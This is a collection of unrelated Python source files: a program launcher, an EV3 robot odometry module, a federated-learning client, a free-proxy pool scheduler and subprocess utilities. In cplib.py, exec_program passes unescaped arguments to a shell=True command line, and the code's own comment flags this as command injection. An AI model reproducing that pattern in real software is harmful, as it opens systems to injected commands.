        # Run the server in the current location - this blocks until it's stopped
        _run_server()
if __name__ == '__main__':
    # Generate indices and serve from the current directory downwards when run
    # as the entry point. serve_dir dispatches on sys.argv[1]
    # (port | generate | cleanup).
    serve_dir('.')
|
cplib.py | # -*- encoding: utf-8 -*-
import sys
import os.path
import subprocess
from multiprocessing import Process
__version__ = (0, 4, 0)
# Anchor data files next to the script when running under a regular
# interpreter, or next to the executable itself when frozen (e.g. py2exe /
# PyInstaller, where sys.executable is the bundled exe).
# NOTE(review): the 'python.exe' check is Windows-specific - confirm this
# tool is intended to be Windows-only.
if 'python.exe' in sys.executable:
    PATH = os.path.dirname(os.path.realpath(sys.argv[0]))
else:
    PATH = os.path.dirname(os.path.realpath(sys.executable))
# CSV registry of known programs: a "program,path" header row followed by
# one "name,path" row per registered program.
DATA = os.path.join(PATH, 'custom_path.csv')
def print_list():
    """Print the name (first CSV field) of every registered program."""
    with open(DATA, 'r', encoding='utf-8') as apps:
        lines = apps.read().split('\n')
    # Skip the "program,path" header row
    for entry in lines[1:]:
        print(entry.split(',')[0])
def exec_program(prog, args):
    """Run the registered program `prog` with `args`, blocking until it
    exits. Returns the process return code (subprocess.call result).
    SECURITY: shell=True with string concatenation - `args` values are
    interpolated into a shell command line unescaped, so untrusted input
    can inject shell commands. Consider a list argv with shell=False.
    """
    return subprocess.call('"%s" %s' % (search_program(prog), ' '.join(args)), shell=True)
def nowait_process(args):
    """Spawn `args` as a child process without waiting for it to finish.
    @param args: argv list for subprocess.Popen.
    """
    # Fire and forget: the Popen handle is intentionally discarded (the
    # previous unused `pid` local has been removed).
    subprocess.Popen(args)
def exec_nowait(prog, args_):
    """Launch the registered program `prog` with arguments `args_` in a
    background process, then exit the current interpreter immediately.
    @param prog: registered program name (resolved via search_program).
    @param args_: sequence of argument strings for the program.
    """
    progfull = search_program(prog)
    arglist = [progfull]
    # BUG FIX: the original appended the whole args_ sequence as a single
    # nested element, so Popen received ['prog', ['a', 'b']] and failed;
    # extend() flattens the arguments into the argv list.
    if len(args_) > 0:
        arglist.extend(args_)
    process = Process(target=nowait_process, args=[arglist])
    process.start()
    sys.exit(0)
def show_path(prog, args):
    """Print the full shell command line that exec_program would run."""
    resolved = search_program(prog)
    joined_args = ' '.join(args)
    print('"%s" %s' % (resolved, joined_args))
def search_program(prog):
    """Resolve a registered program name to its stored path.
    @raise NoProgramListException: the registry file does not exist.
    @raise ProgramNotFoundException: no registry row matches `prog`.
    """
    if not os.path.isfile(DATA):
        raise NoProgramListException()
    with open(DATA, 'r', encoding='utf-8') as apps:
        contents = apps.read()
    # Skip the "program,path" header; each remaining row is "name,path"
    for entry in contents.split('\n')[1:]:
        # Same loose match as before: the name followed by a dot anywhere in
        # the row (typically hits the executable's extension in the path)
        if prog + '.' in entry:
            return entry.split(',')[1]
    raise ProgramNotFoundException()
def add_program(prog, path):
    """Register a new program name -> path mapping in the CSV registry,
    creating the registry (with its header row) if it does not exist.
    @param prog: program name to register.
    @param path: filesystem path of the program's executable.
    @raise DuplicateProgramException: `prog` is already registered.
    @return True on success.
    """
    if not os.path.isfile(DATA):
        with open(DATA, 'w', encoding='utf-8') as apps:
            apps.write('program,path')
    with open(DATA, 'r', encoding='utf-8') as apps:
        # BUG FIX: compare against the name column exactly. The old raw
        # substring test over the whole file falsely flagged e.g. "git" as a
        # duplicate of an existing "github" entry, or of a name appearing
        # anywhere inside a stored path.
        existing = {line.split(',')[0] for line in apps.read().split('\n')}
    if prog in existing:
        raise DuplicateProgramException()
    with open(DATA, 'a', encoding='utf-8') as apps:
        apps.write('\n%s,%s' % (prog, path))
    return True
class NoProgramListException(Exception):
    """Raised when the program registry file (DATA) does not exist."""
    pass
class ProgramNotFoundException(Exception):
    """Raised when no registry entry matches the requested program name."""
    pass
class DuplicateProgramException(Exception):
    """Raised when attempting to register a program name twice."""
    pass
euler.py | #!/usr/bin/env python3
from ev3dev2.motor import Motor, SpeedRPS, MoveTank
from ev3dev2.sensor.lego import ColorSensor, UltrasonicSensor
from ev3dev2.power import PowerSupply
from math import pi, sin, cos, atan
from threading import Thread
import numpy as np
from time import sleep, time
class sensores_y_bateria:
    """Convenience wrapper around the EV3 ultrasonic sensor, colour sensor
    and battery, exposing their readings as simple properties."""
    def __init__(self, sonar, sensor_color):
        # sonar / sensor_color are EV3 sensor port addresses
        self._sonar = UltrasonicSensor(sonar)
        self._color = ColorSensor(sensor_color)
        self._bateria = PowerSupply()
    # Battery
    @property
    def voltaje_bateria(self):
        """Measured battery voltage in volts."""
        return self._bateria.measured_volts
    @property
    def correinte_bateria(self):
        """Measured battery current in amps."""
        return self._bateria.measured_amps
    # Ultrasonic (sonar) sensor
    @property
    def distancia_sonar(self):
        """Sonar distance, converted from centimetres to metres."""
        return (self._sonar.distance_centimeters / 100)
    @property
    def otros_Sensores_presentes(self):
        """Whether the sonar detects another ultrasonic sensor nearby."""
        return self._sonar.other_sensor_present
    # Colour sensor
    def calibrar_blaco(self):
        """Calibrate the colour sensor's white reference."""
        self._color.calibrate_white()
    @property
    def color(self):
        """Detected colour code."""
        return self._color.color
    @property
    def nombre_color(self):
        """Detected colour as a human-readable name."""
        return self._color.color_name
    @property
    def ambiente(self):
        """Ambient light intensity reading."""
        return self._color.ambient_light_intensity
    @property
    def reflexion(self):
        """Reflected light intensity reading."""
        return self._color.reflected_light_intensity
    @property
    def rgb(self):
        """Raw (red, green, blue) component reading."""
        return self._color.rgb
class movimiento:
    """Differential-drive movement layer for a two-motor EV3 robot.
    Converts between robot-level (linear, angular) velocities and per-wheel
    angular velocities using the wheel radius and wheel separation."""
    def __init__(self, motor_izquierdo, motor_derecho, diametro_rueda, separacion_ruedas):
        # Motor port addresses for the left/right wheels; wheel geometry is
        # given as diameter and axle separation (units assumed consistent
        # with the velocities used by callers - TODO confirm metres)
        self._motor_izquierdo = Motor(motor_izquierdo)
        self._motor_derecho = Motor(motor_derecho)
        self._dos_motores = MoveTank(motor_izquierdo, motor_derecho)
        self._radio = diametro_rueda/2
        self._sruedas = separacion_ruedas
    def _SpeedRadPS(self, value):
        # Convert rad/s into the ev3dev2 SpeedRPS (rotations per second) unit
        return SpeedRPS(value/(2*pi))
    # Individual motors
    @property
    def w_motor_derecho(self):
        """Right wheel angular velocity in rad/s (from encoder speed)."""
        return 2*pi*(self._motor_derecho.speed/self._motor_derecho.count_per_rot)
    @w_motor_derecho.setter
    def w_motor_derecho(self, velocidad):
        self._motor_derecho.on(self._SpeedRadPS(velocidad))
    @property
    def w_motor_izquierdo(self):
        """Left wheel angular velocity in rad/s (from encoder speed)."""
        return 2*pi*(self._motor_izquierdo.speed/self._motor_izquierdo.count_per_rot)
    @w_motor_izquierdo.setter
    def w_motor_izquierdo(self, velocidad):
        self._motor_izquierdo.on(self._SpeedRadPS(velocidad))
    @property
    def dc_motor_izquierdo(self):
        """Left motor duty cycle."""
        return self._motor_izquierdo.duty_cycle
    @dc_motor_izquierdo.setter
    def dc_motor_izquierdo(self, ciclo):
        self._motor_izquierdo.run_direct(duty_cycle_sp = ciclo)
    @property
    def dc_motor_derecho(self):
        """Right motor duty cycle."""
        return self._motor_derecho.duty_cycle
    @dc_motor_derecho.setter
    def dc_motor_derecho(self, ciclo):
        self._motor_derecho.run_direct(duty_cycle_sp = ciclo)
    # Both motors together
    def correr(self, linear, angular):
        """Drive with the given linear and angular velocity.
        Differential-drive inverse kinematics: wheel_w = (v +/- w*L/2) / r."""
        self._derecha = ((linear)+((angular*self._sruedas)/2))/self._radio
        self._izquierda = ((linear)-((angular*self._sruedas)/2))/self._radio
        self._dos_motores.on(self._SpeedRadPS(self._izquierda), self._SpeedRadPS(self._derecha))
    def correr_tiempo(self, linear, angular, seconds, bloqueo):
        """Drive as in correr() for `seconds`; `bloqueo` selects whether the
        call blocks until the time elapses."""
        self._derecha = ((linear)+((angular*self._sruedas)/2))/self._radio
        self._izquierda = ((linear)-((angular*self._sruedas)/2))/self._radio
        self._dos_motores.on_for_seconds(self._SpeedRadPS(self._izquierda), self._SpeedRadPS(self._derecha), seconds, block = bloqueo)
    def parar(self):
        """Stop both motors."""
        self._dos_motores.off()
    @property
    def velocidad_linear(self):
        """Robot linear velocity derived from the two wheel speeds."""
        return ((self.w_motor_derecho+self.w_motor_izquierdo)/2)*self._radio
    @property
    def velocidad_angular(self):
        """Robot angular velocity derived from the two wheel speeds."""
        return ((self.w_motor_derecho-self.w_motor_izquierdo)*self._radio)/self._sruedas
class odometria(movimiento):
    """Movement layer extended with dead-reckoning odometry.
    A background thread integrates wheel encoder ticks into a pose estimate
    stored as [x, y, <unused>, heading] (index 2 is never written by the
    integration - TODO confirm its intended meaning); a second optional
    thread logs the pose to a file at a fixed interval."""
    def __init__(self, motor_izquierdo, motor_derecho, diametro_rueda, separacion_ruedas):
        movimiento.__init__(self, motor_izquierdo, motor_derecho, diametro_rueda, separacion_ruedas)
        self._perimetro_rueda = 2*pi*self._radio
        # Poll/log interval in seconds for both background threads
        self._tiempo_espera = 0.01
        # Pose estimate: [x, y, unused, heading]
        self._posicion_robot = [0.0, 0.0, 0.0, 0.0]
        self._odometria_activa = False
        self._escribir_fichero_activo = False
        self._f = None
    def empezar_odometria(self, posicion):
        """Start the odometry thread, integrating from the given pose."""
        self._posicion_robot = posicion
        def _hilo_odometria():
            # Integrate encoder tick deltas into the pose until stopped
            izquierda_anterior = 0.0
            derecha_anterior = 0.0
            while self._odometria_activa:
                izquierda_actual = self._motor_izquierdo.position
                derecha_actual = self._motor_derecho.position
                ticks_izquierda = izquierda_actual - izquierda_anterior
                ticks_derecha = derecha_actual - derecha_anterior
                if not ticks_izquierda and not ticks_derecha:
                    # No movement since the last poll - wait and retry
                    if self._tiempo_espera:
                        sleep(self._tiempo_espera)
                    continue
                izquierda_anterior = izquierda_actual
                derecha_anterior = derecha_actual
                # Ticks -> wheel rotations -> distance travelled per wheel
                rotacion_izquierda = float(ticks_izquierda / self._motor_izquierdo.count_per_rot)
                rotacion_derecha = float(ticks_derecha / self._motor_derecho.count_per_rot)
                distancia_izquierda = float(rotacion_izquierda * self._perimetro_rueda)
                distancia_derecha = float(rotacion_derecha * self._perimetro_rueda)
                # Differential-drive update: average advance plus heading change
                distancia_total = (distancia_izquierda + distancia_derecha) / 2.0
                rotacion_total = (distancia_derecha - distancia_izquierda) / self._sruedas
                self._posicion_robot[0] += distancia_total * cos(self._posicion_robot[3])
                self._posicion_robot[1] += distancia_total * sin(self._posicion_robot[3])
                self._posicion_robot[3] += rotacion_total
                if self._tiempo_espera:
                    sleep(self._tiempo_espera)
        self._odometria_activa = True
        self._id_hilo_odometria = Thread(target = _hilo_odometria)
        self._id_hilo_odometria.start()
    def parar_odometria(self):
        """Stop the odometry thread and wait for it to exit."""
        self._odometria_activa = False
        self._id_hilo_odometria.join(timeout=None)
    @property
    def posicion(self):
        """Current pose estimate [x, y, unused, heading]."""
        return self._posicion_robot
    def empezar_posicion_fichero(self, nombre_fichero):
        """Start a background thread logging the pose to `nombre_fichero`."""
        self._f = open(nombre_fichero,"w")
        def _hilo_fichero():
            # One "<index> <pose>" line per interval until stopped
            i = 0
            while self._escribir_fichero_activo:
                self._f.write(str(i)+ " "+str(self._posicion_robot)+"\n")
                i = i + 1
                sleep(self._tiempo_espera)
        self._escribir_fichero_activo = True
        self._id_hilo_fichero = Thread(target = _hilo_fichero)
        self._id_hilo_fichero.start()
    def parar_posicion_fichero(self):
        """Stop the logging thread and close the log file."""
        self._escribir_fichero_activo = False
        self._id_hilo_fichero.join(timeout=None)
        self._f.close()
|
client.py | import json
import os
import tempfile
import threading
import time
import fedn.common.net.grpc.fedn_pb2 as fedn
import fedn.common.net.grpc.fedn_pb2_grpc as rpc
import grpc
# TODO Remove from this level. Abstract to unified non implementation specific client.
from fedn.utils.dispatcher import Dispatcher
CHUNK_SIZE = 1024 * 1024
from datetime import datetime
from fedn.clients.client.state import ClientState, ClientStateToString
from fedn.utils.helpers import get_helper
class Client:
    """FEDn Client.

    Connects to the discovery service for a combiner assignment, sets up the
    gRPC channel and stubs, prepares the compute-package dispatcher, and then
    serves model update (training) and model validation requests on daemon
    threads.
    """

    def __init__(self, config):
        """Initialise the client from a config dict and start background threads.

        Blocks while polling the discovery service until this client is
        assigned a combiner.
        """
        from fedn.common.net.connect import ConnectorClient, Status
        self.connector = ConnectorClient(config['discover_host'],
                                         config['discover_port'],
                                         config['token'],
                                         config['name'],
                                         config['preferred_combiner'],
                                         config['client_id'],
                                         secure=config['secure'],
                                         preshared_cert=config['preshared_cert'],
                                         verify_cert=config['verify_cert'])
        self.name = config['name']
        self.started_at = datetime.now()
        self.logs = []
        client_config = {}
        print("Asking for assignment", flush=True)
        # Poll until the discovery service assigns us a combiner. (The
        # redundant method-local `import time` was removed; `time` is
        # imported at module level.)
        while True:
            status, response = self.connector.assign()
            if status == Status.TryAgain:
                time.sleep(5)
                continue
            if status == Status.Assigned:
                client_config = response
                break
            time.sleep(5)
            print(".", end=' ', flush=True)
        print("Got assigned!", flush=True)
        # TODO use the client_config['certificate'] for setting up secure comms'
        if client_config['certificate']:
            import base64
            cert = base64.b64decode(client_config['certificate'])  # .decode('utf-8')
            credentials = grpc.ssl_channel_credentials(root_certificates=cert)
            channel = grpc.secure_channel("{}:{}".format(client_config['host'], str(client_config['port'])),
                                          credentials)
        else:
            channel = grpc.insecure_channel("{}:{}".format(client_config['host'], str(client_config['port'])))
        self.connection = rpc.ConnectorStub(channel)
        self.orchestrator = rpc.CombinerStub(channel)
        self.models = rpc.ModelServiceStub(channel)
        print("Client: {} connected {} to {}:{}".format(self.name,
                                                        "SECURED" if client_config['certificate'] else "INSECURE",
                                                        client_config['host'], client_config['port']), flush=True)
        if config['remote_compute_context']:
            # Download the compute package from the controller, retrying up
            # to 10 times with a 60s pause.
            from fedn.common.control.package import PackageRuntime
            pr = PackageRuntime(os.getcwd(), os.getcwd())
            retval = None
            tries = 10
            while tries > 0:
                retval = pr.download(config['discover_host'], config['discover_port'], config['token'])
                if retval:
                    break
                time.sleep(60)
                print("No compute package availabe... retrying in 60s Trying {} more times.".format(tries), flush=True)
                tries -= 1
            if retval:
                pr.unpack()
                self.dispatcher = pr.dispatcher()
                try:
                    # Optional bootstrap hook provided by the package
                    self.dispatcher.run_cmd("startup")
                except KeyError:
                    print("No startup code present. skipping")
        else:
            # TODO: Deprecate
            dispatch_config = {'entry_points':
                                   {'predict': {'command': 'python3 predict.py'},
                                    'train': {'command': 'python3 train.py'},
                                    'validate': {'command': 'python3 validate.py'}}}
            dispatch_dir = os.getcwd()
            self.dispatcher = Dispatcher(dispatch_config, dispatch_dir)
        self.lock = threading.Lock()
        if 'model_type' in client_config.keys():
            self.helper = get_helper(client_config['model_type'])
            if not self.helper:
                print("Failed to retrive helper class settings! {}".format(client_config), flush=True)
        threading.Thread(target=self._send_heartbeat, daemon=True).start()
        threading.Thread(target=self.__listen_to_model_update_request_stream, daemon=True).start()
        threading.Thread(target=self.__listen_to_model_validation_request_stream, daemon=True).start()
        self.state = ClientState.idle

    def get_model(self, id):
        """Fetch a model from the Combiner model service.

        :return: BytesIO with the model data, or None when the download failed.
        """
        from io import BytesIO
        data = BytesIO()
        for part in self.models.Download(fedn.ModelRequest(id=id)):
            if part.status == fedn.ModelStatus.IN_PROGRESS:
                data.write(part.data)
            if part.status == fedn.ModelStatus.OK:
                return data
            if part.status == fedn.ModelStatus.FAILED:
                return None
        return data

    def set_model(self, model, id):
        """Upload a model (BytesIO or object with .stream()) to the Combiner."""
        from io import BytesIO
        if not isinstance(model, BytesIO):
            bt = BytesIO()
            for d in model.stream(32 * 1024):
                bt.write(d)
        else:
            bt = model
        bt.seek(0, 0)

        def upload_request_generator(mdl):
            # Stream the model in CHUNK_SIZE pieces; a final empty read
            # yields the terminating OK frame. (Unused counter removed.)
            while True:
                b = mdl.read(CHUNK_SIZE)
                if b:
                    result = fedn.ModelRequest(data=b, id=id, status=fedn.ModelStatus.IN_PROGRESS)
                else:
                    result = fedn.ModelRequest(id=id, status=fedn.ModelStatus.OK)
                yield result
                if not b:
                    break

        result = self.models.Upload(upload_request_generator(bt))
        return result

    def __listen_to_model_update_request_stream(self):
        """Subscribe to the model update request stream; runs forever,
        resubscribing after transient gRPC errors."""
        r = fedn.ClientAvailableMessage()
        r.sender.name = self.name
        r.sender.role = fedn.WORKER
        metadata = [('client', r.sender.name)]
        while True:
            try:
                for request in self.orchestrator.ModelUpdateRequestStream(r, metadata=metadata):
                    if request.sender.role == fedn.COMBINER:
                        # Process training request
                        global_model_id = request.model_id
                        # TODO: Error handling
                        self.send_status("Received model update request.", log_level=fedn.Status.AUDIT,
                                         type=fedn.StatusType.MODEL_UPDATE_REQUEST, request=request)
                        tic = time.time()
                        model_id, meta = self.__process_training_request(global_model_id)
                        processing_time = time.time() - tic
                        meta['processing_time'] = processing_time
                        print(meta, flush=True)
                        if model_id is not None:
                            # Notify the combiner that a model update is available
                            update = fedn.ModelUpdate()
                            update.sender.name = self.name
                            update.sender.role = fedn.WORKER
                            update.receiver.name = request.sender.name
                            update.receiver.role = request.sender.role
                            update.model_id = request.model_id
                            update.model_update_id = str(model_id)
                            update.timestamp = str(datetime.now())
                            update.correlation_id = request.correlation_id
                            update.meta = json.dumps(meta)
                            # TODO: Check responses
                            response = self.orchestrator.SendModelUpdate(update)
                            self.send_status("Model update completed.", log_level=fedn.Status.AUDIT,
                                             type=fedn.StatusType.MODEL_UPDATE, request=update)
                        else:
                            self.send_status("Client {} failed to complete model update.",
                                             log_level=fedn.Status.WARNING,
                                             request=request)
            except grpc.RpcError as e:
                status_code = e.code()
                timeout = 5
                print("CLIENT __listen_to_model_update_request_stream: GRPC ERROR {} retrying in {}..".format(
                    status_code.name, timeout), flush=True)
                time.sleep(timeout)

    def __listen_to_model_validation_request_stream(self):
        """Subscribe to the model validation request stream; runs forever,
        resubscribing after transient gRPC errors."""
        r = fedn.ClientAvailableMessage()
        r.sender.name = self.name
        r.sender.role = fedn.WORKER
        while True:
            try:
                for request in self.orchestrator.ModelValidationRequestStream(r):
                    # Process validation request
                    model_id = request.model_id
                    # TODO: Error handling
                    self.send_status("Recieved model validation request.", log_level=fedn.Status.AUDIT,
                                     type=fedn.StatusType.MODEL_VALIDATION_REQUEST, request=request)
                    metrics = self.__process_validation_request(model_id)
                    if metrics is not None:
                        # Send validation
                        validation = fedn.ModelValidation()
                        validation.sender.name = self.name
                        validation.sender.role = fedn.WORKER
                        validation.receiver.name = request.sender.name
                        validation.receiver.role = request.sender.role
                        validation.model_id = str(model_id)
                        validation.data = json.dumps(metrics)
                        self.str = str(datetime.now())
                        validation.timestamp = self.str
                        validation.correlation_id = request.correlation_id
                        response = self.orchestrator.SendModelValidation(validation)
                        self.send_status("Model validation completed.", log_level=fedn.Status.AUDIT,
                                         type=fedn.StatusType.MODEL_VALIDATION, request=validation)
                    else:
                        self.send_status("Client {} failed to complete model validation.".format(self.name),
                                         log_level=fedn.Status.WARNING, request=request)
            except grpc.RpcError as e:
                status_code = e.code()
                timeout = 5
                print("CLIENT __listen_to_model_validation_request_stream: GRPC ERROR {} retrying in {}..".format(
                    status_code.name, timeout), flush=True)
                time.sleep(timeout)

    def __process_training_request(self, model_id):
        """Download the global model, run the 'train' entry point, upload the
        result, and return (updated_model_id, meta) with timing info.
        On failure returns (None, {'status': 'failed', 'error': ...}).
        """
        self.send_status("\t Starting processing of training request for model_id {}".format(model_id))
        self.state = ClientState.training
        try:
            meta = {}
            tic = time.time()
            mdl = self.get_model(str(model_id))
            meta['fetch_model'] = time.time() - tic
            inpath = self.helper.get_tmp_path()
            with open(inpath, 'wb') as fh:
                fh.write(mdl.getbuffer())
            outpath = self.helper.get_tmp_path()
            tic = time.time()
            # TODO: Check return status, fail gracefully
            self.dispatcher.run_cmd("train {} {}".format(inpath, outpath))
            meta['exec_training'] = time.time() - tic
            tic = time.time()
            import io
            out_model = None
            with open(outpath, "rb") as fr:
                out_model = io.BytesIO(fr.read())
            import uuid
            updated_model_id = uuid.uuid4()
            self.set_model(out_model, str(updated_model_id))
            meta['upload_model'] = time.time() - tic
            os.unlink(inpath)
            os.unlink(outpath)
        except Exception as e:
            print("ERROR could not process training request due to error: {}".format(e), flush=True)
            updated_model_id = None
            meta = {'status': 'failed', 'error': str(e)}
        self.state = ClientState.idle
        return updated_model_id, meta

    def __process_validation_request(self, model_id):
        """Download the model, run the 'validate' entry point and return the
        parsed metrics dict; re-raises on failure."""
        self.send_status("Processing validation request for model_id {}".format(model_id))
        self.state = ClientState.validating
        try:
            model = self.get_model(str(model_id))
            inpath = self.helper.get_tmp_path()
            with open(inpath, "wb") as fh:
                fh.write(model.getbuffer())
            _, outpath = tempfile.mkstemp()
            self.dispatcher.run_cmd("validate {} {}".format(inpath, outpath))
            with open(outpath, "r") as fh:
                validation = json.loads(fh.read())
            os.unlink(inpath)
            os.unlink(outpath)
        except Exception as e:
            print("Validation failed with exception {}".format(e), flush=True)
            # BUG FIX: reset state before propagating so the client is not
            # stuck in 'validating'; the original also left unreachable
            # dead code (state reset + return None) after this raise.
            self.state = ClientState.idle
            raise
        self.state = ClientState.idle
        return validation

    def send_status(self, msg, log_level=fedn.Status.INFO, type=None, request=None):
        """Report a status message to the combiner and append it to the local log."""
        from google.protobuf.json_format import MessageToJson
        status = fedn.Status()
        status.timestamp = str(datetime.now())
        status.sender.name = self.name
        status.sender.role = fedn.WORKER
        status.log_level = log_level
        status.status = str(msg)
        if type is not None:
            status.type = type
        if request is not None:
            status.data = MessageToJson(request)
        self.logs.append(
            "{} {} LOG LEVEL {} MESSAGE {}".format(str(datetime.now()), status.sender.name, status.log_level,
                                                   status.status))
        response = self.connection.SendStatus(status)

    def _send_heartbeat(self, update_frequency=2.0):
        """Send a heartbeat to the Combiner every `update_frequency` seconds."""
        while True:
            heartbeat = fedn.Heartbeat(sender=fedn.Client(name=self.name, role=fedn.WORKER))
            try:
                self.connection.SendHeartbeat(heartbeat)
            except grpc.RpcError as e:
                status_code = e.code()
                print("CLIENT heartbeat: GRPC ERROR {} retrying..".format(status_code.name), flush=True)
            time.sleep(update_frequency)

    def run_web(self):
        """Serve a minimal status page on port 8080 (blocking).
        stdout is silenced while Flask runs to keep the console log clean."""
        from flask import Flask
        app = Flask(__name__)
        from fedn.common.net.web.client import page, style

        @app.route('/')
        def index():
            logs_fancy = str()
            for log in self.logs:
                logs_fancy += "<p>" + log + "</p>\n"
            return page.format(client=self.name, state=ClientStateToString(self.state), style=style, logs=logs_fancy)

        import sys
        self._original_stdout = sys.stdout
        sys.stdout = open(os.devnull, 'w')
        app.run(host="0.0.0.0", port="8080")
        sys.stdout.close()
        sys.stdout = self._original_stdout

    def run(self):
        """Main loop: start the web UI thread, then print state transitions
        and a periodic liveness message until interrupted."""
        threading.Thread(target=self.run_web, daemon=True).start()
        try:
            cnt = 0
            old_state = self.state
            while True:
                time.sleep(1)
                cnt += 1
                if self.state != old_state:
                    print("CLIENT {}".format(ClientStateToString(self.state)), flush=True)
                    # BUG FIX: remember the new state; the original never
                    # updated old_state, so the transition message repeated
                    # every second after the first state change.
                    old_state = self.state
                if cnt > 5:
                    print("CLIENT active", flush=True)
                    cnt = 0
        except KeyboardInterrupt:
            print("ok exiting..")
|
scheduler.py | #!/usr/bin/python
# -*- coding utf-8 -*-
# Project: ProxyPool
# Author: jiangnan
# Mail: jiangnanmax@gmail.com
# Date: 2018/12/6
import time
from multiprocessing import Process
import asyncio
import aiohttp
from aiohttp import ClientProxyConnectionError as ProxyConnectionError,ServerDisconnectedError,ClientResponseError,\
ClientConnectorError
from proxypool.db import RedisClient
from proxypool.errors import ProxyResourceDepletionError
from proxypool.crawler import FreeProxyCrawler
from proxypool.settings import *
from asyncio import TimeoutError
class ValidtyTester(object):
    """Asynchronously checks raw proxies against a test URL and stores the
    working ones in Redis.

    NOTE: set_raw_proxies() must be called before test_all_proxies() - it
    supplies the batch AND (re)creates the Redis connection.
    """
    # Target URL used to decide whether a proxy works
    test_proxy = TEST_PROXY

    def __init__(self):
        self._raw_proxies = None
        self._valid_proxies = []

    def set_raw_proxies(self, proxies):
        """Set the batch of proxies to test and (re)open the Redis client."""
        self._raw_proxies = proxies
        self._conn = RedisClient()

    async def test_single_proxy(self, proxy):
        """Attempt one GET through `proxy`; push it to Redis on HTTP 200."""
        try:
            async with aiohttp.ClientSession() as session:
                try:
                    if isinstance(proxy, bytes):
                        proxy = proxy.decode('utf-8')
                    real_proxy = 'https://' + proxy
                    print('Testing', proxy)
                    # CONSISTENCY FIX: use the class attribute (same value)
                    # instead of reaching for the module-level TEST_PROXY
                    # constant, which left `test_proxy` defined but unused.
                    async with session.get(self.test_proxy, proxy=real_proxy,
                                           timeout=TEST_PROXY_TIMEOUT) as response:
                        if response.status == 200:
                            self._conn.put(proxy)
                            print('Valid proxy', proxy)
                except (ProxyConnectionError, TimeoutError, ValueError):
                    print('Invalid proxy', proxy)
        except (ServerDisconnectedError, ClientResponseError, ClientConnectorError) as s:
            print(s)

    def test_all_proxies(self):
        """Run test_single_proxy concurrently over the whole raw batch."""
        print("Running the ValidtyTester...")
        try:
            loop = asyncio.get_event_loop()
            tasks = [self.test_single_proxy(proxy) for proxy in self._raw_proxies]
            loop.run_until_complete(asyncio.wait(tasks))
        except ValueError:
            print("Async error...")
class ProxyPoolAdder(object):
    """Crawls free-proxy sites and feeds validated proxies into the Redis
    pool until it reaches the configured upper threshold."""
    def __init__(self, upper_threshold):
        self._conn = RedisClient()
        self._crawler = FreeProxyCrawler()
        self._tester = ValidtyTester()
        # Stop adding once the pool holds this many proxies
        self._upper_threshold = upper_threshold
    def is_over_upper_threshold(self):
        """Return True when the pool already holds enough proxies."""
        return self._conn.list_len >= self._upper_threshold
    def add_proxies_to_pool(self):
        """Run every registered crawl function, validating and storing the
        results, until the pool is full.
        Raises ProxyResourceDepletionError when no crawl source yields any
        proxies at all.
        """
        print("Running the ProxyPoolAdder...")
        raw_proxies_count = 0
        while not self.is_over_upper_threshold():
            # __CrawlFunc__/__CrawlFuncCount__ are attributes registered on
            # the crawler (presumably by its metaclass - one entry per
            # crawl_* method; TODO confirm against FreeProxyCrawler)
            for callback_type in range(self._crawler.__CrawlFuncCount__):
                callback = self._crawler.__CrawlFunc__[callback_type]
                raw_proxies = self._crawler.get_raw_proxies(callback=callback)
                self._tester.set_raw_proxies(raw_proxies)
                self._tester.test_all_proxies()
                raw_proxies_count += len(raw_proxies)
                if self.is_over_upper_threshold():
                    print("Proxies are enough...")
                    break
            # Every source came back empty: nothing left to add
            if raw_proxies_count == 0:
                raise ProxyResourceDepletionError
class Scheduler(object):
    """Wires the proxy pool together: one process periodically re-validates
    stored proxies, another tops the pool up when it runs low."""

    @staticmethod
    def test_proxies(cycle=PROXY_VALID_CHECK_CYCLE):
        """Re-test half of the stored proxies every `cycle` seconds, forever."""
        conn = RedisClient()
        tester = ValidtyTester()
        while True:
            print("Testing the validty of proxies...")
            count_to_test = int(0.5 * conn.list_len)
            if count_to_test == 0:
                # Nothing stored yet - wait for the adder to fill the pool
                print("The proxy pool is empty...")
                time.sleep(cycle)
                continue
            batch = conn.get_for_test(count_to_test)
            tester.set_raw_proxies(batch)
            tester.test_all_proxies()
            time.sleep(cycle)

    @staticmethod
    def check_pool_len(lower_thershold=PROXYPOOL_LOWER_THRESHOLD,
                       upper_threshold=PROXYPOOL_UPPER_THRESHOLD, cycle=PROXYPOOL_LEN_CHECK_CYCLE):
        """Top the pool up whenever its size drops below the lower threshold,
        checking every `cycle` seconds, forever."""
        conn = RedisClient()
        adder = ProxyPoolAdder(upper_threshold)
        while True:
            if conn.list_len < lower_thershold:
                adder.add_proxies_to_pool()
            time.sleep(cycle)

    def run(self):
        """Start both maintenance loops, each in its own process."""
        print("Running the scheduler...")
        validator = Process(target=Scheduler.test_proxies)
        replenisher = Process(target=Scheduler.check_pool_len)
        replenisher.start()
        validator.start()
process.py | from concurrent.futures import ThreadPoolExecutor
from functools import reduce, wraps
import inspect
import io
import logging
import multiprocessing as mp
import os
import queue
import re
import select
import signal
import stat
import subprocess
import sys
import threading
import _thread
import traceback
import psutil
from .core import Namespace, as_list, flatten, fn_name
from .os import dir_of, to_mb
from .time import Timeout, Timer
log = logging.getLogger(__name__)
def run_subprocess(*popenargs,
                   input=None, capture_output=False, timeout=None, check=False, communicate_fn=None,
                   **kwargs):
    """
    a clone of :function:`subprocess.run` which allows custom handling of communication
    :param popenargs: positional arguments forwarded to :class:`subprocess.Popen`.
    :param input: data piped to the child's stdin (implies ``stdin=PIPE``).
    :param capture_output: capture both stdout and stderr (mutually exclusive
        with explicit ``stdout``/``stderr`` kwargs).
    :param timeout: seconds to wait for the child before killing it.
    :param check: when True, raise CalledProcessError on a non-zero exit code.
    :param communicate_fn: optional replacement for ``Popen.communicate``,
        called as ``communicate_fn(process, input=..., timeout=...)``.
    :param kwargs: forwarded to :class:`subprocess.Popen`.
    :return: a :class:`subprocess.CompletedProcess`.
    :raises subprocess.TimeoutExpired: when the child exceeds *timeout*.
    :raises subprocess.CalledProcessError: when *check* is set and the child fails.
    """
    if input is not None:
        if 'stdin' in kwargs:
            raise ValueError('stdin and input arguments may not both be used.')
        kwargs['stdin'] = subprocess.PIPE
    if capture_output:
        if kwargs.get('stdout') is not None or kwargs.get('stderr') is not None:
            raise ValueError('stdout and stderr arguments may not be used '
                             'with capture_output.')
        kwargs['stdout'] = subprocess.PIPE
        kwargs['stderr'] = subprocess.PIPE

    def communicate(process, input=None, timeout=None):
        return (communicate_fn(process, input=input, timeout=timeout) if communicate_fn
                else process.communicate(input=input, timeout=timeout))

    with subprocess.Popen(*popenargs, **kwargs) as process:
        try:
            stdout, stderr = communicate(process, input, timeout=timeout)
